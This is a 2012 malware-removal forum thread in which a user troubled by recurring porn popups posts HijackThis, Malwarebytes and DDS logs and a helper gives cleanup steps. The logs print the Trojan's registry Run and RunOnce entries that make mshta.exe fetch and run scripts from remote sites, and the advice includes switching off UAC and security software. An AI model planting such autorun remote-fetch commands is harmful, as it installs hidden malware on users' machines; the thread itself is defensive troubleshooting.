# mshta.exe japenese porn popup



## gagraptor (May 23, 2012)

I an constantly getting a pop up from a japanese porn site and the process it uses is MSHTA.exe. if i kill the process it pops up again after 15 or so mins. I have included my hijackthis log below also i ran process explorer on mshta and the command line under image is

C:\Windows\system32\mshta.exe http://ragmat.info/reg2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 4:14:56 PM, on 5/23/2012
Platform: Windows Vista SP2 (WinNT 6.00.1906)
MSIE: Internet Explorer v8.00 (8.00.6001.19222)
Boot mode: Normal

Running processes:
C:\Windows\system32\Dwm.exe
C:\Windows\system32\taskeng.exe
C:\Windows\Explorer.EXE
C:\Windows\RtHDVCpl.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\TeamViewer\Version6\TeamViewer.exe
C:\Program Files\Real\RealPlayer\Update\realsched.exe
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Program Files\DAEMON Tools Lite\daemon.exe
C:\Windows\system32\mshta.exe
C:\Users\GAGAN\Downloads\HijackThis.exe
C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.toshibadirect.com/dpdstart
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://search.imesh.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.yahoo.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://us.rd.yahoo.com/customize/ie/defaults/su/msgr8/*http://www.yahoo.com
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://us.rd.yahoo.com/customize/ie/defaults/sb/msgr8/*http://www.yahoo.com/ext/search/search.html
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://us.rd.yahoo.com/customize/ie/defaults/sp/msgr8/*http://www.yahoo.com
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://home.sweetim.com
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = 
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = 
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = 
R3 - URLSearchHook: uTorrentControl Toolbar - {e9df9360-97f8-4690-afe6-996c80790da4} - C:\Program Files\uTorrentControl\prxtbuTor.dll
O1 - Hosts: ::1 localhost
O2 - BHO: (no name) - {02478D38-C3F9-4efb-9B51-7695ECA05670} - (no file)
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: Skype add-on (mastermind) - {22BF413B-C6D2-4d91-82A9-A0F997BA588C} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O2 - BHO: RealPlayer Download and Record Plugin for Internet Explorer - {3049C3E9-B461-4BC5-8870-4C09146192CA} - C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\IE\rpbrowserrecordplugin.dll
O2 - BHO: Increase performance and video formats for your HTML5 - {326E768D-4182-46FD-9C16-1449A49795F4} - C:\Program Files\DivX\DivX Plus Web Player\ie\DivXHTML5\DivXHTML5.dll
O2 - BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: McAfee SiteAdvisor BHO - {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Oracle\JavaFX 2.0 Runtime\bin\jp2ssv.dll
O2 - BHO: uTorrentControl Toolbar - {e9df9360-97f8-4690-afe6-996c80790da4} - C:\Program Files\uTorrentControl\prxtbuTor.dll
O3 - Toolbar: Veoh Browser Plug-in - {D0943516-5076-4020-A3B5-AEFAF26AB263} - C:\Program Files\Veoh Networks\Veoh\Plugins\reg\VeohToolbar.dll
O3 - Toolbar: (no name) - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - (no file)
O3 - Toolbar: Veoh Web Player Video Finder - {0FBB9689-D3D7-4f7a-A2E2-585B10099BFC} - C:\Program Files\Veoh Networks\VeohWebPlayer\VeohIEToolbar.dll
O3 - Toolbar: McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
O3 - Toolbar: uTorrentControl Toolbar - {e9df9360-97f8-4690-afe6-996c80790da4} - C:\Program Files\uTorrentControl\prxtbuTor.dll
O4 - HKLM\..\Run: [RtHDVCpl] RtHDVCpl.exe
O4 - HKLM\..\Run: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hide
O4 - HKLM\..\Run: [Apoint] C:\Program Files\Apoint2K\Apoint.exe
O4 - HKLM\..\Run: [Skytel] Skytel.exe
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [00TCrdMain] %ProgramFiles%\TOSHIBA\FlashCards\TCrdMain.exe
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [TkBellExe] "c:\program files\real\realplayer\Update\realsched.exe" -osboot
O4 - HKLM\..\Run: [DivXUpdate] "C:\Program Files\DivX\DivX Update\DivXUpdate.exe" /CHECKNOW
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Common Files\Java\Java Update\jusched.exe"
O4 - HKLM\..\Run: [APSDaemon] "C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe"
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [MSC] "c:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
O4 - HKCU\..\Run: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
O4 - HKCU\..\Run: [Google Update] "C:\Users\GAGAN\AppData\Local\Google\Update\GoogleUpdate.exe" /c
O4 - HKCU\..\Run: [DAEMON Tools Lite] "C:\Program Files\DAEMON Tools Lite\daemon.exe"
O4 - HKCU\..\Run: [Yahoo! Pager] "C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE" -quiet
O4 - HKCU\..\Run: [SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://ragmat.info/reg2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP&log=1
O4 - HKCU\..\Run: [RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://ragmat.info/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP
O4 - HKCU\..\RunOnce: [RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://ragmat.info/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-18\..\Run: [Picasa Media Detector] C:\Program Files\Picasa2\PicasaMediaDetector.exe (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [Picasa Media Detector] C:\Program Files\Picasa2\PicasaMediaDetector.exe (User 'Default user')
O9 - Extra button: Skype - {77BF5300-1474-4EC7-9980-D32B190E9B07} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
O18 - Protocol: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
O18 - Protocol: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
O22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\Windows\system32\browseui.dll
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: Agere Modem Call Progress Audio (AgereModemAudio) - Agere Systems - C:\Windows\system32\agrsmsvc.exe
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service: Ati External Event Utility - ATI Technologies Inc. - C:\Windows\system32\Ati2evxx.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: McAfee SiteAdvisor Service - McAfee, Inc. - c:\PROGRA~1\mcafee\SITEAD~1\mcsacore.exe
O23 - Service: TeamViewer 6 (TeamViewer6) - TeamViewer GmbH - C:\Program Files\TeamViewer\Version6\TeamViewer_Service.exe
O23 - Service: TOSHIBA Navi Support Service (TNaviSrv) - TOSHIBA Corporation - C:\Program Files\Toshiba\TOSHIBA DVD PLAYER\TNaviSrv.exe
O23 - Service: TOSHIBA Optical Disc Drive Service (TODDSrv) - TOSHIBA Corporation - C:\Windows\system32\TODDSrv.exe
O23 - Service: Ulead Burning Helper (UleadBurningHelper) - Ulead Systems, Inc. - C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe

--
End of file - 9444 bytes

Please help drving me nuts not keen on reformatting


----------



## Mark1956 (May 7, 2011)

Hi Gagraptor and welcome to TSG, my name is Mark and I will be helping you.

At the top of the Malware forum there is a notice *Everyone MUST read this BEFORE posting for help in this forum*.

As you have not followed that instruction this may be why you have not received a reply. Please go Here, follow *ALL* the instructions and post the logs that are requested.

*DO NOT* make any attempt to delete *mshta.exe* as it is a legitimate system file.

I would also like you to do the following and post the logs, as follows:
Put the logs into seperate posts if it makes it easier.

*STEP 1*
Run HijackThis, and press *"Scan."* When the scan is complete place a *check mark* next to the following entries (if they are still present): (Please be careful and do not check any other boxes)
*NOTE* For Windows 7 and Vista you must turn off the User Account Control to allow HJT to run correctly.
For Vista, click on *Start* and type* User Accounts* in the search box and hit *Enter*, click on *Turn User Account Control on or off*, uncheck the box to turn off *UAC*. For Windows 7 click on Start and type *UAC* in the box and hit *Enter*, then move the slider all the way to the bottom and click on *ok*. *This action is not required for Windows XP.*

*O2 - BHO: (no name) - {02478D38-C3F9-4efb-9B51-7695ECA05670} - (no file)*
*O3 - Toolbar: (no name) - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - (no file)*

After checking these items *CLOSE ALL open windows* except HijackThis and click *"Fix Checked"* to remove the entries you checked. A box will pop up asking you if you wish to fix the selected items. Please choose *YES.* Once it has fixed them, close HijackThis.
If you receive an error message that indicates HJT cannot remove the entries please try disabling your security software.*How to disable your security software*
If after disabling your security software there is still a problem, this could be due to the Malware on your system.
Please confirm if the fix runs without a problem. If there is a problem tell me what has happened and post the details of any error messages.
Follow this by opening HJT, go to the *Main Menu* and Click on *"Do a system scan and save logfile."* When the log pops up in *Notepad,* copy and paste that file back here in your next reply.

*STEP 2*

Please download *Malwarebytes Anti-Malware*







and save it to your desktop.

*Important!!* When you save the mbam-setup file, rename it to something random (such as 123abc.exe) *before* beginning the download.
Double-click on the renamed file to install, then follow these instructions for doing a *Quick Scan* in normal mode.
Don't forget to _*check for database definition updates*_ through the program's interface (*preferable method*) before scanning.
_If you cannot update Malwarebytes or use the Internet to download any files to the infected computer, manually update the database by following the instructions in FAQ Section A: 4. Issues_.
Malwarebytes may "make changes to your registry" as part of its disinfection routine. If using other security programs that detect registry changes (ie Spybot's Teatimer), they may interfere or alert you. Temporarily disable such programs or permit them to *allow* the changes.

Double click on the *Malwarebytes* icon on your desktop to launch the program
Under the *Scanner* tab, make sure the *Perform Quick Scan* option is selected.
Click on the *Scan* button.
When finished, a message box will say "_The scan completed successfully. Click *Show Results* to display all objects found_".
Click *OK* to close the message box, then click the *Show Results* button to see a list of any malware that was found.
Make sure that *everything is checked* and then click *Remove Selected*.
When removal is completed, a log report will open in Notepad.
The log is automatically saved and can be viewed by clicking the *Logs* tab.
Copy and paste the contents of that report in your next reply. Be sure to post the complete log to include the top portion which shows the database version and your operating system.
Exit Malwarebytes when done.
_If Malwarebytes encounters a file that is difficult to remove, you will be asked to reboot your computer so it can proceed with the disinfection process. If asked to restart the computer, please do so immediately. *Failure to reboot normally* will prevent Malwarebytes from removing all the malware._

_Note: A 14-day trial of Malwarebytes Anti-Malware PRO is available as an option when first installing the free version so all users can test the real-time protection component for a period of two weeks. When the limited time period expires those features will be deactivated and locked. Enabling the Protection Module feature again *requires registration and purchase of a license key* that includes free lifetime upgrades and support. If you continue to use the free version, there is no requirement to buy a license...you can just use it as a stand-alone scanner._
*NOTE:* Some types of malware will target Malwarebytes and other security tools to keep them from running properly. If that's the case, use Malwarebytes Chameleon and follow the onscreen instructions. The Chameleon folder can be accessed by opening the program folder for Malwarebytes Anti-Malware (normally C:\Program Files\Malwarebytes' Anti-Malware or C:\Program Files (x86)\Malwarebytes' Anti-Malware).


----------



## gagraptor (May 23, 2012)

I am sorry i forgot to add other logs. I have followed your instructions, i already had malwarebytes when i run it i get 3 trojans and i'm asked to restart after restarting when i run malwarebytes again i get the same 3 viruses. i am not able to run able to run gmer as my system freezes.
i'm including all the other logs. PS i also a virtual drive emulation s/w but cant find it to uninstall.


----------



## gagraptor (May 23, 2012)

Malwarebytes Anti-Malware 1.61.0.1400
www.malwarebytes.org

Database version: v2012.05.28.01

Windows Vista Service Pack 2 x86 NTFS
Internet Explorer 8.0.6001.19222
GAGAN :: GAGAN-PC [administrator]

5/28/2012 1:28:46 AM
mbam-log-2012-05-28 (01-28-46).txt

Scan type: Quick scan
Scan options enabled: Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken | PUP | PUM
Scan options disabled: P2P
Objects scanned: 204053
Time elapsed: 11 minute(s), 4 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 3
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP (Trojan.PMovie.Gen) -> Data: mshta.exe http://peachfilm.net/reg2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP&log=1 -> Quarantined and deleted successfully.
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP (Trojan.PMovie.Gen) -> Data: mshta.exe http://peachfilm.net/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP -> Quarantined and deleted successfully.
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce|RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP (Trojan.PMovie.Gen) -> Data: mshta.exe http://peachfilm.net/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP -> Quarantined and deleted successfully.

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

(end)


----------



## gagraptor (May 23, 2012)

.
DDS (Ver_2011-08-26.01) - NTFSx86 
Internet Explorer: 8.0.6001.19222 BrowserJavaVersion: 10.3.1
Run by GAGAN at 3:16:57 on 2012-05-28
Microsoft® Windows Vista™ Home Premium 6.0.6002.2.1252.1.1033.18.1917.1043 [GMT -4:00]
.
AV: Microsoft Security Essentials *Enabled/Updated* {9765EA51-0D3C-7DFB-6091-10E4E1F341F6}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Microsoft Security Essentials *Enabled/Updated* {2C040BB5-2B06-7275-5A21-2B969A740B4B}
.
============== Running Processes ===============
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k rpcss
c:\Program Files\Microsoft Security Client\MsMpEng.exe
C:\Windows\system32\Ati2evxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\SLsvc.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\Ati2evxx.exe
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\Dwm.exe
C:\Windows\system32\taskeng.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\agrsmsvc.exe
C:\Windows\system32\svchost.exe -k apphost
C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
c:\PROGRA~1\mcafee\SITEAD~1\mcsacore.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\system32\rundll32.exe
C:\Windows\System32\tcpsvcs.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Program Files\TeamViewer\Version6\TeamViewer_Service.exe
C:\Program Files\Toshiba\TOSHIBA DVD PLAYER\TNaviSrv.exe
C:\Windows\system32\TODDSrv.exe
C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
C:\Windows\system32\svchost.exe -k iissvcs
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Windows\system32\SearchIndexer.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Windows\System32\alg.exe
C:\Windows\RtHDVCpl.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\Real\RealPlayer\Update\realsched.exe
C:\Program Files\DivX\DivX Update\DivXUpdate.exe
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Microsoft Security Client\msseces.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Program Files\DAEMON Tools Lite\daemon.exe
C:\Program Files\Synaptics\SynTP\SynToshiba.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe
C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\system32\taskeng.exe
C:\Windows\system32\mshta.exe
C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Windows\system32\rundll32.exe
C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
c:\PROGRA~1\mcafee\SITEAD~1\saui.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://search.imesh.com/
uDefault_Page_URL = hxxp://www.toshibadirect.com/dpdstart
mStart Page = hxxp://home.sweetim.com
mDefault_Page_URL = hxxp://www.yahoo.com/
mDefault_Search_URL = hxxp://us.rd.yahoo.com/customize/ie/defaults/su/msgr8/*http://www.yahoo.com
mSearch Page = hxxp://us.rd.yahoo.com/customize/ie/defaults/sp/msgr8/*http://www.yahoo.com
mSearch Bar = hxxp://us.rd.yahoo.com/customize/ie/defaults/sb/msgr8/*http://www.yahoo.com/ext/search/search.html
uInternet Settings,ProxyOverride = *.local
mSearchAssistant = 
uURLSearchHooks: uTorrentControl Toolbar: {e9df9360-97f8-4690-afe6-996c80790da4} - c:\program files\utorrentcontrol\prxtbuTor.dll
mURLSearchHooks: uTorrentControl Toolbar: {e9df9360-97f8-4690-afe6-996c80790da4} - c:\program files\utorrentcontrol\prxtbuTor.dll
mURLSearchHooks: H - No File
BHO: Adobe PDF Reader Link Helper: {06849e9f-c8d7-4d59-b87d-784b7d6be0b3} - c:\program files\common files\adobe\acrobat\activex\AcroIEHelper.dll
BHO: Skype add-on (mastermind): {22bf413b-c6d2-4d91-82a9-a0f997ba588c} - c:\program files\skype\toolbars\internet explorer\SkypeIEPlugin.dll
BHO: RealPlayer Download and Record Plugin for Internet Explorer: {3049c3e9-b461-4bc5-8870-4c09146192ca} - c:\programdata\real\realplayer\browserrecordplugin\ie\rpbrowserrecordplugin.dll
BHO: DivX Plus Web Player HTML5 : {326e768d-4182-46fd-9c16-1449a49795f4} - c:\program files\divx\divx plus web player\ie\divxhtml5\DivXHTML5.dll
BHO: Windows Live ID Sign-in Helper: {9030d464-4c02-4abf-8ecc-5164760863c6} - c:\program files\common files\microsoft shared\windows live\WindowsLiveLogin.dll
BHO: McAfee SiteAdvisor BHO: {b164e929-a1b6-4a06-b104-2cd0e90a88ff} - c:\progra~1\mcafee\sitead~1\mcieplg.dll
BHO: Java(tm) Plug-In 2 SSV Helper: {dbc80044-a445-435b-bc74-9c25c1c588a9} - c:\program files\oracle\javafx 2.0 runtime\bin\jp2ssv.dll
BHO: uTorrentControl Toolbar: {e9df9360-97f8-4690-afe6-996c80790da4} - c:\program files\utorrentcontrol\prxtbuTor.dll
TB: Veoh Browser Plug-in: {d0943516-5076-4020-a3b5-aefaf26ab263} - c:\program files\veoh networks\veoh\plugins\reg\VeohToolbar.dll
TB: Veoh Web Player Video Finder: {0fbb9689-d3d7-4f7a-a2e2-585b10099bfc} - c:\program files\veoh networks\veohwebplayer\VeohIEToolbar.dll
TB: McAfee SiteAdvisor Toolbar: {0ebbbe48-bad4-4b4c-8e5a-516abecae064} - c:\progra~1\mcafee\sitead~1\mcieplg.dll
TB: uTorrentControl Toolbar: {e9df9360-97f8-4690-afe6-996c80790da4} - c:\program files\utorrentcontrol\prxtbuTor.dll
TB: {EEE6C35B-6118-11DC-9C72-001320C79847} - No File
TB: {A057A204-BACC-4D26-9990-79A187E2698E} - No File
TB: {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - No File
uRun: [Sidebar] c:\program files\windows sidebar\sidebar.exe /autoRun
uRun: [<NO NAME>] 
uRun: [Google Update] "c:\users\gagan\appdata\local\google\update\GoogleUpdate.exe" /c
uRun: [DAEMON Tools Lite] "c:\program files\daemon tools lite\daemon.exe"
uRun: [Yahoo! Pager] "c:\progra~1\yahoo!\messen~1\YAHOOM~1.EXE" -quiet
uRun: [SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://peachfilm.net/reg2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP&log=1
uRun: [RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://peachfilm.net/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP
uRunOnce: [RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://peachfilm.net/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP
mRun: [RtHDVCpl] RtHDVCpl.exe
mRun: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hide
mRun: [Apoint] c:\program files\apoint2k\Apoint.exe
mRun: [Skytel] Skytel.exe
mRun: [Adobe Reader Speed Launcher] "c:\program files\adobe\reader 8.0\reader\Reader_sl.exe"
mRun: [00TCrdMain] %ProgramFiles%\TOSHIBA\FlashCards\TCrdMain.exe
mRun: [SynTPEnh] c:\program files\synaptics\syntp\SynTPEnh.exe
mRun: [QuickTime Task] "c:\program files\quicktime\QTTask.exe" -atboottime
mRun: [TkBellExe] "c:\program files\real\realplayer\update\realsched.exe" -osboot
mRun: [DivXUpdate] "c:\program files\divx\divx update\DivXUpdate.exe" /CHECKNOW
mRun: [SunJavaUpdateSched] "c:\program files\common files\java\java update\jusched.exe"
mRun: [APSDaemon] "c:\program files\common files\apple\apple application support\APSDaemon.exe"
mRun: [iTunesHelper] "c:\program files\itunes\iTunesHelper.exe"
mRun: [MSC] "c:\program files\microsoft security client\msseces.exe" -hide -runkey
dRun: [Picasa Media Detector] c:\program files\picasa2\PicasaMediaDetector.exe
mPolicies-explorer: BindDirectlyToPropertySetStorage = 0 (0x0)
mPolicies-system: EnableUIADesktopToggle = 0 (0x0)
mPolicies-system: EnableLinkedConnections = 1 (0x1)
IE: {77BF5300-1474-4EC7-9980-D32B190E9B07} - {77BF5300-1474-4EC7-9980-D32B190E9B07} - c:\program files\skype\toolbars\internet explorer\SkypeIEPlugin.dll
LSP: c:\windows\system32\wpclsp.dll
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_03-windows-i586.cab
DPF: {CAFEEFAC-0016-0000-0029-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_29-windows-i586.cab
DPF: {CAFEEFAC-0017-0000-0003-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_03-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_03-windows-i586.cab
TCP: DhcpNameServer = 192.168.1.1
TCP: Interfaces\{AA0BA040-CE6A-4F94-8BD1-7AFDC60B8156} : DhcpNameServer = 192.168.1.1
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\progra~1\mcafee\sitead~1\McIEPlg.dll
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\progra~1\mcafee\sitead~1\McIEPlg.dll
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - c:\progra~1\common~1\skype\SKYPE4~1.DLL
.
================= FIREFOX ===================
.
FF - ProfilePath - c:\users\gagan\appdata\roaming\mozilla\firefox\profiles\bav5d5wt.default\
FF - prefs.js: browser.search.selectedEngine - GoogIe
FF - prefs.js: browser.startup.homepage - hxxp://www.aol.com/
FF - prefs.js: keyword.URL - hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT3072254&SearchSource=2&q=
FF - component: c:\program files\mcafee\siteadvisor\components\McFFPlg.dll
FF - plugin: c:\program files\divx\divx ovs helper\npovshelper.dll
FF - plugin: c:\program files\divx\divx plus web player\npdivx32.dll
FF - plugin: c:\program files\mcafee\siteadvisor\NPMcFFPlg32.dll
FF - plugin: c:\program files\microsoft silverlight\4.1.10329.0\npctrlui.dll
FF - plugin: c:\program files\mozilla firefox\plugins\npPandoWebInst.dll
FF - plugin: c:\program files\mozilla firefox\plugins\NPTURNMED.dll
FF - plugin: c:\program files\oracle\javafx 2.0 runtime\bin\plugin2\npjp2.dll
FF - plugin: c:\program files\veoh networks\veoh\plugins\noreg\NPVeohVersion.dll
FF - plugin: c:\program files\veoh networks\veohwebplayer\npWebPlayerVideoPluginATL.dll
